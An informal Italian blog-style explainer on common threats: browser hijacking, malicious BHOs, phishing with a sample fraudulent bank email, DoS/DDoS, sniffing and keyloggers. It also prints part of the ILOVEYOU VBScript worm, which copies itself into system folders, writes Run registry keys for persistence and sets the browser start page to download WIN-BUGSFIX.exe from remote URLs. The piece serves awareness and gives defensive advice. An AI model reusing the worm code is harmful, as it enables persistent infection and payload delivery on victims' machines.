Hijacking
Il termine:
“hijacking in informatica è un termine spesso usato quando applicazioni dannose tentano di sfruttare e impadronirsi dell’ applicazione usata dall’ utente, un esempio noto è lo Spyware detto anche programma spia.”
Browser Hijacking:
La tecnica riportata prende in considerazione come principale oggetto il nostro browser è lui che ci mette in contatto con il mondo delle pagine Web.
Questo tipo di Risorsa tenta in qualche modo di dirottare il vostro comando tramite delle modifiche che porterò più avanti nella pagina, proprio come spiegavo prima
la tecnica si basa sull’ appropriarsi della macchina e del software in questo caso del nostro browser esempio:
Software usato: Internet Explorer
ricerca dell’ utente [http://www.esempio.it], il sito contenente finestre Popup ci spedisce sulla pagina di un venditore di magliette e modifica a nostra insaputa ad esempio la pagina preinpostata da noi all’interno della configurazione della pagina web principale di internet explorer.
Non è facile ripristinare la sessione di internet explorer proprio perche vengono installate chiavi di registro e applicazioni per dirottare la navigazione.
Questi tipi di dirottamenti possono essere bloccati da programmi specializzati in più questi comportamenti anomali vengono suddivisi come Spyware o addirittura Trojan e vengono usati per garantire al sito, di cui non avevate voglia neanche di vedere, di guadagnare qualche soldo naturalmente in tasca al WebMaster.
B.H.O (Browser Helper OBJECT’S)
Sono praticamente quelle finestre fastidiose che compaiono durante la normale navigazione in internet, in questi casi non è il sito che visitate l’autore del drammatico episodio ma il nostro browser di cui l’ hijacker a preso il totale posesso.
Quindi se digiteremo il sito che vogliamo vedere il simpaticissimo B.H.O’s ci renderà la navigazione noiosa con le sue finestrelle del cazz…..
Sono praticamente delle plugin sotto forma di dll che al contrario di qualsiasi B.H.O ’s ad esempio Google Toolbar recano danno sia alla navigazione ma decisamente recano danno alla privacy dell’utente stesso, catturando indirizzi digitati e abitudini quotidiane.
Al fine possiamo dire che questi programmini vengono messi in rete per trovare le abitudini degli utenti dell’intera rete, tutto questo racchiude
una domanda:
-Strano solo questo fanno-???
Risposta:
Ebbene no, questi B.H.O’s essendo programmati in modo non del tutto corretto spesso definiscono l’instabilità del sistema operativo e se vi va bene rallentamenti della navigazione.
Phishing.
La parola pishing deriva da fishing che vuol dire “pescare”, che cosa possiamo fare con questa tecnica? cosa c’entra pescare, non sono mica un pesce!!!
Il maggior numero di utenti internet che usano una casella email sono soggetti molto spesso a fraudolenti messaggi di posta che possono colpire l’utente ad es.
Carissimo , paolo
la invitiamo a rifornirci delle sue credenziali Bancarie a seguito di un errore nel nostro archivio utenti.
saluti il direttore di bancaveneta.
Antonio La Marca
Adesso questo esempio non farebbe abboccare all’amo nessun utente perchè non curato nei dettagli,
ma alcune persone non sapenti del fatto dell’esistenza del Phishing darebberò al malintenzionato le proprie credenziali bancarie.
Naturalmente l’email falsa che viene spedita alla vittima viene curata nel minimo dettaglio per far pensare all’utente che è veramente la sua banca a contattarlo.
Il metodo per difendersi è quello di chiamare in questo caso direttamente la vostra banca chiedendogli ad esempio di controllare il vostro conto, in questo modo sapreste benissimo che l’ email che vi è arrivata è assolutamente un’ email falsa, mi raccomando non fate cazzate!!!.
Dos (Denial of Service) & DDos (Distributing denial of service)
IMMAGINE CHE RAPPRESENTA UN DDos.
Questi tipi di attacchi vengono eseguiti dai CRACKER per lo scopo di bloccare un servizio proprio come dice la parola Denial Of Service che significa appunto “negazione del servizio”.
La tecnica nasce da un bug che ricopre il protocollo TCP/IP inviando pacchetti di dati ad un’altra macchina, la macchina vittima ci dovrà rispondere.
Facciamo un esempio banale su come inviare dati e riceverli:
Sintassi: ping [-t] [-a] [-n conteggio] [-l dimensione] [-f] [-i durata]
[-v tiposervizio] [-r conteggio] [-s conteggio]
[[-j elencohost] | [-k elencohost]]
[-w timeout] elenco di destinazioni
Opzioni:
-t Effettua un ping sull’host specificato finché non vi
interrotto.
Per visualizzare le statistiche e continuare – digit
Ctrl-Inter;
Per interrompere – digitare Ctrl-C.
-a Risolve gli indirizzi in nomi host.
-n conteggio Numero di richieste di eco da inviare.
-l dimensione Invia dimensioni buffer.
-f Imposta il flag per la disattivazione della
frammentazione nel pacchetto.
-i durata Durata.
-v tiposervizio Tipologia di servizio.
-r conteggio Registra route per il conteggio dei punti di passagg
-s conteggio Timestamp per il conteggio dei punti di passaggio.
-j elencohost Instradamento libero lungo l’elenco host.
-k elencohost Instradamento vincolato lungo l’elenco host.
-w timeout Timeout in millisecondi per ogni risposta.
queste sono le opzioni del comando ping per eseguirlo digitare da CMD ping e immettere l’indirizzo ip che si vuole in corrispondenza del tipo di comando prescelto.
Possiamo dire che un tempo un classico ping con parametro -t poteva dare fastidio oggi questi piccoli comando non sono nocivi ma non è detta l’ultima!!!
Gli attacchi DoS si sono evoluti nel corso del tempo, da semplici attacchi, condotti da singoli PC, ad attacchi organizzati in modo distribuito da qui la parola DDoS, portati da migliaia di computer disseminati per tutta la rete, questa rete è una rete di bot.
Pensateci un attimo!!! migliaia di computer che eseguono assieme lo stesso comando allo stesso server incredibile no?.
Nella figura sopra possiamo vedere il CRACKER che possiede il controllo di vari computer sfruttandoli per lanciare un attacco Ddos.
Scripting-exploit
Il termine exploit significa sfruttamento, oggi è un termine molto usato, un exploit è praticamente lo sfruttamento di una falla nella programmazione del codice ospitante.
Gli Scripting-Exploit sono comunemente programmati ad esempio con HTML, ACTIVE X, JAVASCRIPT, WSH
possono consentire l’ avvio di virus malware ecc…. presenterò una porzione di codice da cui deriva il virus scritto in Vbs ” I LOVE YOU ” che naturalmente usa Vbs ma non si genera nelle pagine web.
NATURALMENTE NON POSSO INSERIRE L’INTERO CODICE PER MOTIVI DI SICUREZZA.
ECCO UNA PICCOLA PARTE DEL CODICE:
rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / ispyder@xxx.com / @GRxxx Group / Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX .exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\StartPage","about:blank"
end if
end sub
Questo è una parte di codice di ‘ i love you ‘ che naturalmente veniva spedita per email.
1)Per non rischiare consiglio di controllare il proprio browser per assicurarsi che la funzione script vbs non sia abilitata. Se si consiglio vivamente di toglierla.
2)windos xp a abilitata la funzione di esecuzione di WSH “windows scripting host” molti virus programmati in vbs non possono essere avviati su macchine windows se la funzione è disattivata, ma naturalmente un virus fatto bene può fare quello che gli pare ma comunque sia è meglio disattivarla.
Sniffing:
La tecnica dello sniffing che significa “sniffare”, termine molto intuitivo tra l’altro,viene spesso usata per estrapolare dati sensibili dai pacchetti intercettati.
l’attività di sniffing può essere portata a termine per due motivi:
1° Lo sniffing è un ottimo rimedio per analizzare il traffico in una rete di computer onde evitare problemi
all’ interno della stessa.
2° Lo sniffing può essere usato per prelevare dati sensibili.
Esitono appositi software che danno la possibilità di sniffare reti, uno secondo me dei più buoni è WIRESHARK
il link al download del programma (GPL LICENSE)
Disponibile per linux/Winxp/OS X e altri
Richiede Wincap.
Keylogger:
Per scoprire cosa scrive la nostra vittima durante il giorno o per avere le credenziali d’accesso al conto
dobbiamo installare nel computer remoto un programmino.
I cosidetti Keylogger sono, e agiscono come pappagalli della tastiera, cioè copiano e inviano alla persona interessata tutto quello che si digita e che comprende un carattere ASCII(“American Standard Code for Information Interchange”, cioe’ “Standard americano per lo scambio di informazioni”.
Naturalmente il sistema operativo converte quello che digitiamo da tastiera.
TableCode ASCII:
American Standard Code For Information Interchange
ExtendedTableASCII:
EXTENDEDASCIICODE
Le informazioni e le raccomandazioni fornite dal Sito o via e-mail sono a scopo informativo.
